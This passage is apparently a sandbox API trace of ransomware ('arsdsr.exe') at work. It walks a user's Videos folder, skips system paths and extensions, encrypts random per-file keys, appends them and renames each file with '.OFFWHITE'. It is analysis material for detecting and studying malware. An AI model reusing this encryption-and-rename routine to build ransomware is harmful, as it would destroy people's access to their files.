(hObject=0x21c) returned 1 [0136.180] GetProcessHeap () returned 0x500000 [0136.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.180] GetProcessHeap () returned 0x500000 [0136.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.180] GetProcessHeap () returned 0x500000 [0136.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.180] GetProcessHeap () returned 0x500000 [0136.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.180] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv" [0136.180] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv.OFFWHITE" [0136.180] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ljbrmr kyhds.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ljbrmr kyhds.mkv.offwhite")) returned 1 [0136.286] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8516900, ftCreationTime.dwHighDateTime=0x1d5e5fc, ftLastAccessTime.dwLowDateTime=0xa2d0d7d0, ftLastAccessTime.dwHighDateTime=0x1d5dcfd, ftLastWriteTime.dwLowDateTime=0xa2d0d7d0, ftLastWriteTime.dwHighDateTime=0x1d5dcfd, nFileSizeHigh=0x0, nFileSizeLow=0x11268, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="MDLOs9exXY.flv", cAlternateFileName="MDLOS9~1.FLV")) returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2=".") returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="..") returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="...") returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="windows") returned -1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="$recycle.bin") returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="rsa") returned -1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="ntuser.dat") returned -1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="programdata") returned -1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="appdata") returned 1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="program files") returned -1 [0136.286] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="program files (x86)") returned -1 [0136.286] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.286] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="MDLOs9exXY.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv" [0136.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.286] PathFindExtensionW (pszPath="MDLOs9exXY.flv") returned=".flv" [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.286] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.287] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.287] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.287] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.287] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.287] lstrcmpiW (lpString1="MDLOs9exXY.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.287] GetProcessHeap () returned 0x500000 [0136.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220b0 [0136.287] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\mdlos9exxy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.287] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=70248) returned 1 [0136.287] GetProcessHeap () returned 0x500000 [0136.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.287] GetProcessHeap () returned 0x500000 [0136.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.287] GetProcessHeap () returned 0x500000 [0136.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.287] GetProcessHeap () returned 0x500000 [0136.288] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.288] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.288] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.288] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.288] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.288] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.288] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.288] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.288] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.288] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.288] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.288] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.288] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.288] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11268, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.288] SetLastError (dwErrCode=0x0) [0136.288] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.290] GetLastError () returned 0x0 [0136.290] GetLastError () returned 0x0 [0136.290] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11368, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.290] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.290] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11468, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.290] WriteFile (in: hFile=0x21c, lpBuffer=0x5220b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220b0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.290] GetProcessHeap () returned 0x500000 [0136.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x11268) returned 0x55a7b8 [0136.290] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.290] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x11268, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x11268, lpOverlapped=0x0) returned 1 [0136.295] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.295] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x11268, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x11268, lpOverlapped=0x0) returned 1 [0136.295] GetProcessHeap () returned 0x500000 [0136.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.296] CloseHandle (hObject=0x21c) returned 1 [0136.300] GetProcessHeap () returned 0x500000 [0136.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.301] GetProcessHeap () returned 0x500000 [0136.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.301] GetProcessHeap () returned 0x500000 [0136.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.301] GetProcessHeap () returned 0x500000 [0136.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.301] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv" [0136.301] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv.OFFWHITE" [0136.301] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\mdlos9exxy.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\MDLOs9exXY.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\mdlos9exxy.flv.offwhite")) returned 1 [0136.301] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88322f50, ftCreationTime.dwHighDateTime=0x1d5e365, ftLastAccessTime.dwLowDateTime=0xc4a7ad00, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0xc4a7ad00, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x14f6a, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="N02avdZBZY.flv", cAlternateFileName="N02AVD~1.FLV")) returned 1 [0136.301] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2=".") returned 1 [0136.301] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="..") returned 1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="...") returned 1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="windows") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="$recycle.bin") returned 1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="rsa") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="ntuser.dat") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="programdata") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="appdata") returned 1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="program files") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="program files (x86)") returned -1 [0136.302] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.302] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="N02avdZBZY.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv" [0136.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.302] PathFindExtensionW (pszPath="N02avdZBZY.flv") returned=".flv" [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.302] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.302] lstrcmpiW (lpString1="N02avdZBZY.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.302] GetProcessHeap () returned 0x500000 [0136.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220c0 [0136.302] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\n02avdzbzy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.303] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=85866) returned 1 [0136.303] GetProcessHeap () returned 0x500000 [0136.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.303] GetProcessHeap () returned 0x500000 [0136.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.303] GetProcessHeap () returned 0x500000 [0136.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.303] GetProcessHeap () returned 0x500000 [0136.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.303] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.303] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.303] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.304] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.304] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14f6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.304] SetLastError (dwErrCode=0x0) [0136.304] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.306] GetLastError () returned 0x0 [0136.306] GetLastError () returned 0x0 [0136.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1506a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.306] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1516a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.306] WriteFile (in: hFile=0x21c, lpBuffer=0x5220c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220c0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.306] GetProcessHeap () returned 0x500000 [0136.306] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14f6a) returned 0x55a7b8 [0136.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.306] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x14f6a, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x14f6a, lpOverlapped=0x0) returned 1 [0136.310] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.310] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x14f6a, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x14f6a, lpOverlapped=0x0) returned 1 [0136.311] GetProcessHeap () returned 0x500000 [0136.311] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.311] CloseHandle (hObject=0x21c) returned 1 [0136.312] GetProcessHeap () returned 0x500000 [0136.312] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.312] GetProcessHeap () returned 0x500000 [0136.312] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.312] GetProcessHeap () returned 0x500000 [0136.312] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.312] GetProcessHeap () returned 0x500000 [0136.313] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.313] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv" [0136.313] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv.OFFWHITE" [0136.313] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\n02avdzbzy.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\N02avdZBZY.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\n02avdzbzy.flv.offwhite")) returned 1 [0136.313] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31252b0, ftCreationTime.dwHighDateTime=0x1d5dc9e, ftLastAccessTime.dwLowDateTime=0x4164280, ftLastAccessTime.dwHighDateTime=0x1d5d9ea, ftLastWriteTime.dwLowDateTime=0x4164280, ftLastWriteTime.dwHighDateTime=0x1d5d9ea, nFileSizeHigh=0x0, nFileSizeLow=0xd81d, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="OPAFwjodMw cfVJw9.mp4", cAlternateFileName="OPAFWJ~1.MP4")) returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2=".") returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="..") returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="...") returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="windows") returned -1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="$recycle.bin") returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="rsa") returned -1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="ntuser.dat") returned 1 [0136.313] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="programdata") returned -1 [0136.314] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="appdata") returned 1 [0136.314] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="program files") returned -1 [0136.314] lstrcmpiW (lpString1="OPAFwjodMw cfVJw9.mp4", lpString2="program files (x86)") returned -1 [0136.314] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.314] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="OPAFwjodMw cfVJw9.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\OPAFwjodMw cfVJw9.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\OPAFwjodMw cfVJw9.mp4" [0136.314] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.314] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.314] PathFindExtensionW (pszPath="OPAFwjodMw cfVJw9.mp4") returned=".mp4" [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 